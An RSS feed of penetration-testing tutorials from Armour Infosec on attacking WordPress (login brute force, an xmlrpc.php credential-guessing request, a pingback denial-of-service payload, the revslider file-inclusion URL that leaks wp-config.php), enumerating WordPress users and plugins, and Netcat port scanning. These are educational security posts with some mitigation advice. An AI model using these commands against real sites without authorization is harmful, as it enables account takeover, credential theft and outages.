<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Enumeration Archives - Armour Infosec</title>
	<atom:link href="https://www.armourinfosec.com/category/penetration-testing/enumeration/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.armourinfosec.com/category/penetration-testing/enumeration/</link>
	<description>Do Your Part - Be Security Smart</description>
	<lastBuildDate>Thu, 30 Jan 2020 11:31:33 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.3.1</generator>

<image>
	<url>https://www.armourinfosec.com/wp-content/uploads/2018/02/ai.png</url>
	<title>Enumeration Archives - Armour Infosec</title>
	<link>https://www.armourinfosec.com/category/penetration-testing/enumeration/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack WordPress ?</title>
		<link>https://www.armourinfosec.com/how-to-hack-wordpress/</link>
					<comments>https://www.armourinfosec.com/how-to-hack-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[Armour Infosec]]></dc:creator>
		<pubDate>Wed, 29 Jan 2020 13:28:05 +0000</pubDate>
				<category><![CDATA[Enumeration]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<guid isPermaLink="false">https://www.armourinfosec.com/?p=25421</guid>

					<description><![CDATA[<p>Attacking &#38; Exploitation Before starting with this blog firstly visit wordpress enumeration blog . Researchers discovered an ongoing malvertising (online...</p>
<p>The post <a rel="nofollow" href="https://www.armourinfosec.com/how-to-hack-wordpress/">How to Hack WordPress ?</a> appeared first on <a rel="nofollow" href="https://www.armourinfosec.com/">Armour Infosec</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h1>Attacking &amp; Exploitation</h1>
<p>Before starting with this post, first read the <strong><a href="https://www.armourinfosec.com/wordpress-enumeration/">wordpress enumeration</a></strong> post.</p>
<p>Researchers discovered an ongoing malvertising (<span class="js-about-item-abstr">online advertising used to spread malware</span>) campaign targeting millions of WordPress websites, infecting them with backdoors by exploiting vulnerabilities in various WordPress plugins. According to WordPress, nearly 60 million websites are powered by the WordPress content management system, and hundreds of WordPress plugins written by developers around the globe are installed on them. Cyber criminals deliver the payload by exploiting vulnerabilities in some of the most popular WordPress plugins and injecting malicious scripts into unpatched WordPress websites.</p>
<p>Attacker: Kali Linux<br />
Target: WordPress</p>
<h5>Table of Contents</h5>
<p>1. Brute-forcing wp-login.php form<br />
2. Brute Force Login via xmlrpc.php<br />
3. Denial of Service (DoS) via xmlrpc.php<br />
4. Exploit WordPress Plugin<br />
5. Exploit WordPress Theme Example<br />
6. Sniff and Capture Credentials over non-secure login<br />
7. Compromise Systems Administration Tools<br />
8. Content Discovery<br />
9. Vulnerable Server Software</p>
<h3>1. Brute Force wp-login.php Form</h3>
<p>The most common attack against a WordPress user is brute forcing the password of an account to gain access to the back-end of the WordPress system. Other ways a password can be compromised include sniffing the password in clear text over an HTTP login session or even getting the credentials from a key logger on the workstation of the WordPress administrator. Accounts with administrator level access are the most sought after due to the amount of mischief an admin user can get up to; adding PHP command shells or malicious JavaScript directly through the admin interface are common examples.</p>
<p>With the usernames we collected during information gathering we can get started (or just try admin). Take a look at the login form <strong>/wp-login.php</strong> and notice how a failed login confirms the username when an incorrect password is entered. This is very helpful to an attacker; it also makes things more user friendly for an end user who has forgotten their username and password. This &#8220;feature&#8221; has been debated, and it has been decided to keep this response within the WordPress code.<br />
Brute forcing user accounts is possible using a number of open source tools. In addition, there are worm-like scripts that have spread through the WordPress ecosystem, searching for and spreading to WordPress sites with weak admin passwords.</p>
<h5>WPScan</h5>
<p>The previously mentioned WPScan tool, in addition to enumeration, can also perform brute force login attacks.</p>
<pre class="theme:familiar lang:sh decode:true">wpscan --url example.com --wordlist /usr/share/wordlists/rockyou.txt --username testuser --threads 20</pre>
<h5>Nmap NSE Script</h5>
<p>Nmap, the port scanner, can do much more than find open ports. Recent versions of Nmap come bundled with NSE scripts that can be used to test for many different vulnerabilities, including enumerating users and brute forcing WordPress passwords.</p>
<pre class="theme:familiar lang:sh decode:true">nmap -sV --script http-wordpress-enum --script-args limit=25 example.com

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-wordpress-enum:
|   Username found: admin
|   Username found: testadmin
|   Username found: fred
|   Username found: alice
|   Username found: bob
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-enum.limit'</pre>
<h5>Burp Suite</h5>
<p>For those familiar with web application security testing, the Burp Suite Intruder tool can also be used for brute-forcing WordPress passwords. A WordPress login attempt is only an HTTP POST request, after all. Configure Burp Intruder to send a valid username (or a list of usernames) along with a list of possible passwords and wait for the successful login.</p>
<h3><img decoding="async" fetchpriority="high" class="alignnone wp-image-25431" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/edit.png" alt="" width="650" height="294" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/edit.png 546w, https://www.armourinfosec.com/wp-content/uploads/2020/01/edit-300x136.png 300w" sizes="(max-width: 650px) 100vw, 650px" /></h3>
<h3>2. Brute Force Login using xmlrpc.php</h3>
<p>The xmlrpc.php capability is an API endpoint that allows mobile apps and other programmable access to backend functions of the WordPress site such as publishing posts. It is enabled by default and several attacks are possible against the endpoint depending on permissions and the version of the target WordPress installation.<br />
By using the xmlrpc.php endpoint to attack WordPress accounts we may bypass security plugins that are protecting the login form from abuse. This password guessing attack may also be faster, with the result being you can attempt more passwords.</p>
<p>Notice the -d option: in curl this is the data that is sent as the body of the POST request. You could also use Burp or your favorite scripting language for this request.</p>
<pre class="theme:familiar lang:sh decode:true">curl -X POST -d "&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;admin&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;pass&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;" http://examplewp.com/xmlrpc.php</pre>
<p>The response will either indicate an invalid password or report success. It is easy to spot and to work into your script.</p>
<h3>3. Denial of Service (DoS) via xmlrpc.php</h3>
<p>Another use of the xmlrpc.php endpoint is to perform a denial of service attack. If this capability is enabled, we can send a small request to the server and get it to respond with a full page of content to a target of our choosing. The idea is to make multiple requests from different systems and get them all to target a single host, potentially knocking it offline due to network congestion.</p>
<p>First, we enumerate the capabilities of the xmlrpc.php endpoint.</p>
<pre class="theme:familiar lang:sh decode:true">curl -X POST -d "&lt;methodCall&gt;&lt;methodName&gt;system.listMethods&lt;/methodName&gt;&lt;params&gt;&lt;/params&gt;&lt;/methodCall&gt;" http://examplewp.com/xmlrpc.php</pre>
<p>The response will be a list of available methods.</p>
<pre class="theme:familiar lang:default decode:true">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;methodResponse&gt;
&lt;params&gt;
&lt;param&gt;
&lt;value&gt;
&lt;array&gt;&lt;data&gt;
&lt;value&gt;&lt;string&gt;system.listMethods&lt;/string&gt;&lt;/value&gt;
&lt;value&gt;&lt;string&gt;system.getCapabilities&lt;/string&gt;&lt;/value&gt;
&lt;value&gt;&lt;string&gt;pingback.extensions.getPingbacks&lt;/string&gt;&lt;/value&gt;
&lt;value&gt;&lt;string&gt;pingback.ping&lt;/string&gt;&lt;/value&gt;
&lt;value&gt;&lt;string&gt;mt.publishPost&lt;/string&gt;&lt;/value&gt;
**** truncated ****</pre>
<p>Note pingback.ping in the list, which indicates that pingbacks are enabled. Use the following data for the pingback attempt.</p>
<pre class="theme:familiar lang:default decode:true">&lt;methodCall&gt;
&lt;methodName&gt;pingback.ping&lt;/methodName&gt;
&lt;params&gt;&lt;param&gt;
&lt;value&gt;&lt;string&gt;
&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;http://**blog-url-from-wp**&lt;/string&gt;
&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;
&lt;/methodCall&gt;</pre>
<p>Disabling access to xmlrpc.php in your web server configuration or via .htaccess is recommended if you are not using the API. Not only will it block these attacks, it will also reduce the amount of noise in your logs from bots attempting to hit these API endpoints.</p>
<h3>4. Exploit WordPress Plugin</h3>
<p>Plugins, themes and WordPress core all contain a large amount of PHP code from developers around the world. These developers have differing abilities and focus when it comes to writing secure software. For this reason, there are thousands of exploitable vulnerabilities available to an attacker. Updating plugins, the WordPress core, and themes must be a routine task for any WordPress administrator to ensure that known vulnerabilities are patched. Common vulnerabilities include XSS, SQL injection, file upload, and code execution. All of these can have devastating consequences for a WordPress site. Search through Metasploit and exploit-db.com for exploitable WordPress bugs.</p>
<p><strong>Revslider Example Exploit</strong></p>
<p>An example of a WordPress plugin exploit is from a vulnerability discovered 5 years ago. The vulnerable revslider plugin resulted in tens of thousands of compromised WordPress sites. To this day, there are attempts to exploit it in our web server logs even in 2019. One reason it was such a popular plugin is that it was bundled with many themes.</p>
<p>A number of exploitation opportunities are possible, but this is perhaps the easiest to demonstrate. Exploitation is no more difficult than loading this URL in a browser.</p>
<pre class="theme:familiar lang:sh decode:true">https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&amp;img=../wp-config.php</pre>
<p>The HTTP request would download the <strong>wp-config.php</strong> file from the vulnerable site if it had the exploitable version of revslider installed. The exploit type is known as a local file include, as the attacker is tricking the application code into including a sensitive file in the output. The <strong>wp-config.php</strong> is not normally accessible and contains the database credentials for the <strong>WordPress database user.</strong></p>
<p>With the database password, an attacker could attempt to log in as the WordPress admin using the same password (if passwords were re-used). A more common attack vector would be to log in to the phpMyAdmin script, if installed, as this uses the database credentials. If MySQL is exposed, it may even be possible to connect directly to the database using a MySQL database client and the leaked credentials.</p>
<p>Access to the database gives the attacker options to reset the administrator password, attempt to crack the admin hash, or modify content in the database by adding malicious JavaScript or iframes. There are many possibilities for further exploitation once the credentials in wp-config.php are leaked.</p>
<h3>5. Exploit WordPress Theme Example</h3>
<p>Exploits are available from various places and forums. This example uses an exploit from the popular Metasploit Exploitation Framework. The vulnerable theme is the very popular OptimizePress. The vulnerability was released back in 2013, and versions after 1.45 are not vulnerable to this exploit. Numerous bots and automated attack scripts that exploit WordPress sites do not perform the enumeration phase; they simply propel exploits at thousands of sites and hope for a successful payload. Plugins and themes that are installed but not enabled can still be exploited. Scanning for the default locations of those vulnerable files is a highly common attack by automated bots.</p>
<p><img decoding="async" class="alignnone wp-image-25423 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/wp2.jpg" alt="" width="900" height="550" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/wp2.jpg 900w, https://www.armourinfosec.com/wp-content/uploads/2020/01/wp2-300x183.jpg 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/wp2-768x469.jpg 768w" sizes="(max-width: 900px) 100vw, 900px" /></p>
<h3>6. Sniff and Capture Credentials over Non-Secure Login</h3>
<p>Without additional security measures in place (TLS/SSL), accessing the /wp-admin/ dashboard is over an unencrypted connection. This means if you log in to your WordPress site on an unsecured network, such as the wireless at your local coffee shop or airport, your login and password to manage the site could be captured by an attacker watching your session.</p>
<p>In this example Wireshark capture we can clearly see the username and password being captured in our POST request to wp-login.php.<br />
<img decoding="async" class="alignnone wp-image-25424 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/wp1.png" alt="" width="900" height="265" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/wp1.png 900w, https://www.armourinfosec.com/wp-content/uploads/2020/01/wp1-300x88.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/wp1-768x226.png 768w" sizes="(max-width: 900px) 100vw, 900px" /></p>
<h3>7. Compromise Systems Administration Tools</h3>
<p>A successful password guessing attack against a server management account will give an attacker full access to the server and the WordPress application. Services that can be attacked with brute force password guessing include:</p>
<p>SSH service<br />
MySQL database service<br />
Webmin server management<br />
cPanel or WHMCS web hosting control panels<br />
phpMyAdmin database management application</p>
<p>Reduce the chance of management account compromise:</p>
<p>Use strong passwords everywhere, and do not re-use them!<br />
Move SSH to a different port<br />
Use TLS/SSL for web based management services to prevent sniffing and credential compromise<br />
Whitelist the IP addresses that are able to connect to Internet facing services</p>
<h3>8. Content Discovery</h3>
<p>Content Discovery is the process of attempting to find items of interest in a web path. It applies to any web application, but since we are attacking WordPress, target it towards typical files and paths of interest in a WordPress installation.</p>
<p>For example:</p>
<pre class="theme:familiar lang:css decode:true ">curl https://example.com/wp-config.php.bak
curl https://example.com/.wp-config.php.swp</pre>
<p>These two examples use curl to look for a possible backup of the wp-config.php file that we discussed earlier, as it contains sensitive information including database credentials. The second attempt tries to download the swap (.swp) file that vim automatically creates while it is editing a file. A good reason not to edit files directly on your production sites!</p>
<p>Using curl to perform this search task for hundreds or even thousands of common files could be accomplished with a little bit of scripting. On the other hand, more appropriate tools such as Burp Suite, or gobuster, a tool that is very fast due to its parallel processing, will do a much better job.</p>
<h3>9. Vulnerable Server Software</h3>
<p>Testing the WordPress application itself is only one part of ensuring your web site is secure. The server that hosts the website must also be kept secure. Exploitable security vulnerabilities can, of course, be present in server software or the operating system. Examples can be found on any vulnerability mailing list. Recently a remote code execution vulnerability was found in Exim, one of the most popular mail delivery servers on the Internet. <strong>PHPMyAdmin</strong> is a popular application to attack, due to its wide deployment and a long list of vulnerabilities.</p>
<h5>Server Software Misconfiguration</h5>
<p>Even if no exploitable vulnerability is present, a simple misconfiguration can leave a service vulnerable. Often security vulnerabilities are introduced simply through a misconfiguration by an overworked system administrator.</p>
<p>The post <a rel="nofollow" href="https://www.armourinfosec.com/how-to-hack-wordpress/">How to Hack WordPress ?</a> appeared first on <a rel="nofollow" href="https://www.armourinfosec.com/">Armour Infosec</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.armourinfosec.com/how-to-hack-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>WordPress Enumeration</title>
		<link>https://www.armourinfosec.com/wordpress-enumeration/</link>
					<comments>https://www.armourinfosec.com/wordpress-enumeration/#respond</comments>
		
		<dc:creator><![CDATA[Armour Infosec]]></dc:creator>
		<pubDate>Sat, 25 Jan 2020 14:21:12 +0000</pubDate>
				<category><![CDATA[Enumeration]]></category>
		<category><![CDATA[Information Gathering]]></category>
		<guid isPermaLink="false">https://www.armourinfosec.com/?p=25347</guid>

					<description><![CDATA[<p>WordPress User Enumeration These 10 enumeration techniques are a very fast way to identify users of a WordPress installation. With...</p>
<p>The post <a rel="nofollow" href="https://www.armourinfosec.com/wordpress-enumeration/">WordPress Enumeration</a> appeared first on <a rel="nofollow" href="https://www.armourinfosec.com/">Armour Infosec</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h1 class="btx-post-title post-title entry-title">WordPress User Enumeration</h1>
<p>These <strong>10 enumeration techniques</strong> are a very fast way to <strong>identify users</strong> of a WordPress installation. With valid usernames effective <strong>brute force attacks</strong> can be attempted to <strong>guess the password</strong> of the user accounts.</p>
<h2>Introduction to WordPress Security</h2>
<p>There are many common attack vectors that hackers use to attack a WordPress website. In this article we expose many of the common avenues for attack. By revealing these, you can help build your website’s defenses against WordPress attacks.</p>
<p>There are some great guides available on securing a WordPress installation, this article is not intended to repeat those. To get started with securing a WordPress installation, try the excellent guide on <a href="https://wordpress.org/">wordpress.org</a> or the comprehensive guide on the <a href="https://owasp.org/">OWASP</a> site.</p>
<p>It is noteworthy that in a managed WordPress hosting service, some of the attacks (and mitigation) listed below will be the responsibility of the hosting provider. If you are self hosting then security and maintenance is your responsibility. Ready to start? Grab our hoodie and start hacking!</p>
<p>In this article we are going to discuss several ways to identify the valid usernames of any WordPress website.</p>
<h2>Table of Contents:</h2>
<p>1. Enumerating Usernames Through the Author Archives</p>
<p>2. WordPress Enumeration via JSON API</p>
<p>3. WordPress Enumeration via the Login Form</p>
<p>4. Enumerating WordPress Core Version</p>
<p>5. WordPress Plugin (and Version) Enumeration</p>
<p>6. WordPress Theme Enumeration</p>
<p>7. Directory Indexing</p>
<p>8. Server Vulnerability Testing</p>
<p>9. WPScan</p>
<p>10. Nmap NSE Scripts for WordPress</p>
<h4>1. Enumerate Usernames Through the Author Archives</h4>
<p>In many WordPress installations, it is possible to enumerate WordPress usernames through the author archives, including the admin username. To access the author archives, we just need to add author=n (where n is any integer) as a parameter to the WordPress home page, as shown below:</p>
<pre class="theme:familiar lang:sh decode:true ">http://example.com/?author=1</pre>
<p>WordPress automatically redirects the request to the corresponding author archive URL:</p>
<pre class="theme:familiar lang:sh decode:true ">http://example.com/author/admin/</pre>
<p>Using this method, we will be able to identify all the usernames by fuzzing the author parameter.</p>
<h4>2. WordPress Enumeration via JSON API</h4>
<p>Using a JSON endpoint, it may be possible to get a list of users on the site. This was restricted in version 4.7.1, which shows only users who have published a post (or have otherwise been configured to be shown). Prior to this version, all users were shown by default.</p>
<pre class="theme:familiar lang:xhtml decode:true ">https://wordpressexample.com/wp-json/wp/v2/users</pre>
<p>User Enumeration via the JSON user Endpoint</p>
<p><img decoding="async" class="alignnone wp-image-25352 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/11-1.png" alt="" width="741" height="613" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/11-1.png 741w, https://www.armourinfosec.com/wp-content/uploads/2020/01/11-1-300x248.png 300w" sizes="(max-width: 741px) 100vw, 741px" /></p>
<h4>3. WordPress Enumeration via the Login Form</h4>
<p>Valid users can also be confirmed with the login form. Brute forcing the username is possible using the login form, as the response is different for a valid as opposed to an invalid account. Using a tool such as Burp Intruder in Burp Suite, we would load a list of possible usernames and cycle through HTTP POST requests to the WordPress login form, examining the response in each case.</p>
<p>An HTTP response that matches &#8220;invalid password&#8221; indicates that the username is valid. We could then move on to attacking the password using the same process with a common password list.</p>
<p><img decoding="async" class="alignnone wp-image-25353 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/2-1.png" alt="" width="266" height="300" /></p>
<h4>4. Enumerating WordPress Core Version</h4>
<p>Three simple methods can be used to determine the core version of WordPress.</p>
<h5>4.1 Meta Generator</h5>
<p>Check the HTML source of the page for a meta generator tag in the HEAD section. This example is taken from the source of a default WordPress 3.5.2 install with the Twenty Twelve theme. From the source HTML:</p>
<pre class="theme:familiar lang:css decode:true ">&lt;meta name="generator" content="WordPress 3.5.2" /&gt;</pre>
<h5>4.2 Version in readme.html</h5>
<p>If the meta tag has been disabled, check for the presence of /readme.html at the root of the install. Early versions of WordPress had the version right there at the top of the Read Me file, but newer versions of WordPress have removed the version from the ReadMe file.</p>
<p><img decoding="async" class="alignnone wp-image-25354" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/3-1.png" alt="" width="741" height="79" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/3-1.png 854w, https://www.armourinfosec.com/wp-content/uploads/2020/01/3-1-300x32.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/3-1-768x82.png 768w" sizes="(max-width: 741px) 100vw, 741px" /></p>
<h5>Version in HTML Source of Site</h5>
<p>In the HTML source, the version is often appended as a parameter on links to the JavaScript and CSS resources that the page is loading. Depending on the plugin, this will not always be the case, and sites that have minified JS and CSS may not have all of these information leaks present.</p>
<h5>4.3 Security Vulnerabilities in WordPress Core</h5>
<p>If an attacker finds a site with an older WordPress core version, it may be directly exploitable via a security vulnerability in the WordPress core. In addition, it is a clear indication that the site is not well maintained. In a poorly managed site, other components (plugins / themes) may not have been updated either; in this case, the chance of a successful attack has increased considerably.</p>
<h4>5. WordPress Plugin (and Version) Enumeration</h4>
<p>During WordPress Plugin Enumeration, we attempt to find as many installed plugins as we can (even those that are disabled). The knowledge of the installed WordPress plugins may allow us to identify the version and research whether it is vulnerable to known exploits.</p>
<p>Passive analysis: finds plugins through regular HTTP requests to the WordPress site.<br />
Active enumeration: more aggressive, usually involving a script or tool that makes hundreds or even thousands of mostly invalid HTTP requests.</p>
<p>Reading through the HTML source of the WordPress site can reveal installed plugins through JavaScript links, comments and resources, such as CSS, that are loaded into the page. These are the easiest plugins to discover and require no aggressive testing of the target site. Even the HTTP headers can reveal information, such as the X-Powered-By header that reveals the presence of the W3 Total Cache plugin. Some plugins do not leave traces in the HTML source; to find all the installed plugins you have to be more aggressive. A number of tools can brute force known plugin lists from the path /wp-content/plugins/&lt;plugin-to-test&gt;/. The web server's HTTP response code will usually reveal valid directories (often HTTP 403) as opposed to unknown directories.</p>
<p>Once you have a list of plugins that are present on the site, your WordPress scanner or manual requests can be used to determine the version of the plugin. In the readme.txt, we can see the version of the plugin. Compare this against known exploits and we can get a good idea if the site is vulnerable without actually throwing the exploit.</p>
<h4>6. WordPress Theme Enumeration</h4>
<p>WordPress themes can contain vulnerabilities that might expose the site to compromise. Themes are collections of PHP code with HTML and CSS resources. More complex themes have more included components and are more likely to introduce security vulnerabilities. The enumeration of the theme is similar to the detection of plugins. The theme path is often visible in the HTML of the page source. The CSS file getting loaded from the theme will often reveal the path. With the path we have the theme name, and we can load the readme.txt to confirm the theme in use and its version.</p>
<pre class="theme:familiar lang:sh decode:true ">curl http://examplewp.com/wp-content/themes/Avada/readme.txt</pre>
<p>An important consideration when testing for vulnerable WordPress Themes (and plugins) is that a theme that is installed yet not active may still have code that is accessible and vulnerable. This is why brute force testing for theme paths is an important step when assessing an unknown WordPress installation.</p>
<p><img decoding="async" class="alignnone wp-image-25355" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/4-1.png" alt="" width="741" height="108" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/4-1.png 900w, https://www.armourinfosec.com/wp-content/uploads/2020/01/4-1-300x44.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/4-1-768x112.png 768w" sizes="(max-width: 741px) 100vw, 741px" /></p>
<h4>7. Directory Indexing</h4>
<p>Directory indexing is sometimes enabled on the plugins directory. Directory indexing is a function of the web server that allows you to view the contents of a directory in the web accessible path. Viewing the contents of a directory allows an attacker to gather valuable information about the installation, such as installed plugins and themes, without the need to brute force the paths.</p>
<p>To check for directory indexing, you can browse to folder locations and see if you get a response that includes &#8220;Index Of&#8221; and a list of folders / files. Common locations to check would be:</p>
<pre class="theme:familiar lang:sh decode:true">/wp-content/
/wp-content/plugins/
/wp-content/themes/
/uploads/
/images/</pre>
<h4>8. Server Vulnerability Testing</h4>
<p>In this phase, we move into testing network services rather than direct testing of the WordPress installation. Port scanning is the standard technique for the discovery of network services running on the server.</p>
<p>Services that might be present on a WordPress host:</p>
<p><strong>MySQL</strong> Server Remotely Accessible (port 3306)<br />
<strong>CPANEL</strong> administration login portal (port 2082 / 2083)<br />
<strong>Webmin</strong> administration (port 10000)<br />
<strong>FTP</strong> service for file system access<br />
<strong>SSH</strong> for remote control<br />
Other web services hosting admin interfaces or other sites (port 8080 / 8888, etc.)</p>
<p>Any of the above services may allow access to or control of the server through either a security vulnerability or a compromised password. Port scanning can be conducted using the excellent Nmap Port Scanner or an alternative security tool. Carrying on from our enumeration of network services using the port scanner, we could run vulnerability scans against the discovered services to identify exploitable services or other items of interest.</p>
<h5>8.1 Nikto Vulnerability Scanner</h5>
<p>Nikto is another vulnerability scanner that focuses on the discovery of known vulnerable scripts, configuration mistakes and other web server items of interest. The Nikto tool has been around for many years yet still finds a place in the penetration tester&#8217;s toolbox. Tools such as this throw tens of thousands of tests against the target in an attempt to discover known vulnerabilities and other low-hanging fruit. It is a noisy process, filling the target system logs with 404&#8217;s and other errors. Not recommended if you are going after a target ninja style (pentest / red team).</p>
<h4>9. WPScan</h4>
<p>WPScan is a popular WordPress security testing tool that ties many of these simple enumeration techniques together, enabling users to quickly enumerate a WordPress installation. It has a commercial license that restricts free use to personal testing of WordPress sites and non-commercial usage. It attempts to identify users, plugins, and themes, depending on the selected command line options, and also shows known vulnerabilities for each of the discovered plugins.</p>
<p><img decoding="async" class="alignnone wp-image-25357 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/6-1.png" alt="" width="500" height="197" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/6-1.png 500w, https://www.armourinfosec.com/wp-content/uploads/2020/01/6-1-300x118.png 300w" sizes="(max-width: 500px) 100vw, 500px" /></p>
<p><a href="https://github.com/wpscanteam/wpscan">https://github.com/wpscanteam/wpscan</a></p>
<h4>10. Nmap NSE Scripts for WordPress :</h4>
<p>Nmap comes bundled with NSE scripts that extend the functionality of this popular port scanner. A few of the Nmap NSE scripts are particularly helpful for enumerating WordPress users, plugins, and themes using the same techniques we have previously discussed. The best thing about this option is that if you have Nmap installed, you already have these scripts ready to go.</p>
<pre class="theme:familiar lang:sh decode:true ">┌─[root@Dasagreeva]─[/usr/share/nmap/scripts]
└──╼ #ls -lha |grep wordpress
-rw-r--r-- 1 root root 5.0K Nov 26 14:51 http-wordpress-brute.nse
-rw-r--r-- 1 root root 11K Nov 26 14:51 http-wordpress-enum.nse
-rw-r--r-- 1 root root 4.6K Nov 26 14:51 http-wordpress-users.nse</pre>
]]></content:encoded>
					
					<wfw:commentRss>https://www.armourinfosec.com/wordpress-enumeration/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hacking with Netcat : A Comprehensive Guide</title>
		<link>https://www.armourinfosec.com/hacking-with-netcat-a-comprehensive-guide/</link>
					<comments>https://www.armourinfosec.com/hacking-with-netcat-a-comprehensive-guide/#respond</comments>
		
		<dc:creator><![CDATA[Armour Infosec]]></dc:creator>
		<pubDate>Wed, 22 Jan 2020 12:59:53 +0000</pubDate>
				<category><![CDATA[Enumeration]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<guid isPermaLink="false">https://www.armourinfosec.com/?p=25276</guid>

					<description><![CDATA[<p>Netcat is a featured networking utility tool which reads and writes data across network connections, using the TCP/IP protocol. It...</p>
<p>The post <a rel="nofollow" href="https://www.armourinfosec.com/hacking-with-netcat-a-comprehensive-guide/">Hacking with Netcat : A Comprehensive Guide</a> appeared first on <a rel="nofollow" href="https://www.armourinfosec.com/">Armour Infosec</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Netcat</strong> is a featured networking utility tool which reads and writes data across network connections, using the TCP/IP protocol.<br />
It is designed to be a reliable &#8220;back-end&#8221; tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. It&#8217;s so simple, powerful, and useful that many people within the IT community refer to it as the &#8220;<strong>Swiss Army Knife of Hackers</strong>&#8221;.</p>
<h5><strong>Features :</strong></h5>
<ul>
<li>Outbound and Inbound connections, TCP or UDP, to or from any ports.</li>
<li>Tunneling mode, which also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).</li>
<li>Built-in port-scanning capabilities, with randomization</li>
<li>Advanced usage options, such as buffered send-mode (one line every N seconds), and hex dump (to stderr or to a specified file) of transmitted and received data.</li>
<li>Can read command line arguments from standard input</li>
<li>Optional ability to let another program service establish connections</li>
<li>Reading the banner from a port</li>
<li>Encrypted file transfer</li>
<li>Command Line Chat Server</li>
</ul>
<h5><strong>General Syntax :</strong></h5>
<pre class="theme:familiar lang:sh decode:true">nc [options] host port
</pre>
<h5><strong>Getting started with Netcat :</strong></h5>
<p>Netcat can be used from any directory. Let&#8217;s start with the basic option, which shows us the help page:</p>
<pre class="theme:familiar lang:sh decode:true">nc -h
</pre>
<p><img decoding="async" class="alignnone wp-image-25315" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/2-1024x608.png" alt="" width="605" height="359" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/2-1024x608.png 1024w, https://www.armourinfosec.com/wp-content/uploads/2020/01/2-300x178.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/2-768x456.png 768w, https://www.armourinfosec.com/wp-content/uploads/2020/01/2-1536x912.png 1536w, https://www.armourinfosec.com/wp-content/uploads/2020/01/2.png 1707w" sizes="(max-width: 605px) 100vw, 605px" /></p>
<h5><strong>Port Scanning :</strong></h5>
<p>One of the most common uses for netcat is as a port scanner. It can be used to find out which ports are open and running services on a target machine, and it can scan a single port, several ports, or a range of ports.<br />
We will use the <strong>-z</strong> option to scan without sending any data and the <strong>-v</strong> option to enable verbose output for the port scan, as below.</p>
<pre class="theme:familiar lang:sh decode:true">nc -v -z 192.168.1.200 80</pre>
<p><img decoding="async" class="alignnone wp-image-25317 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/3.png" alt="" width="610" height="67" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/3.png 610w, https://www.armourinfosec.com/wp-content/uploads/2020/01/3-300x33.png 300w" sizes="(max-width: 610px) 100vw, 610px" /></p>
<pre class="theme:familiar lang:sh decode:true ">nc -v -z 192.168.1.200 21-25</pre>
<p><img decoding="async" class="alignnone wp-image-25319" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/4.png" alt="" width="604" height="150" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/4.png 622w, https://www.armourinfosec.com/wp-content/uploads/2020/01/4-300x74.png 300w" sizes="(max-width: 604px) 100vw, 604px" /></p>
<h5><strong>Banner Grabbing :</strong></h5>
<p>Netcat can also be used for grabbing a service banner, i.e. the service version, status, etc. To grab the banner from a target port with netcat, use the following command :</p>
<pre class="theme:familiar lang:sh decode:true ">nc -v 192.168.1.200 22</pre>
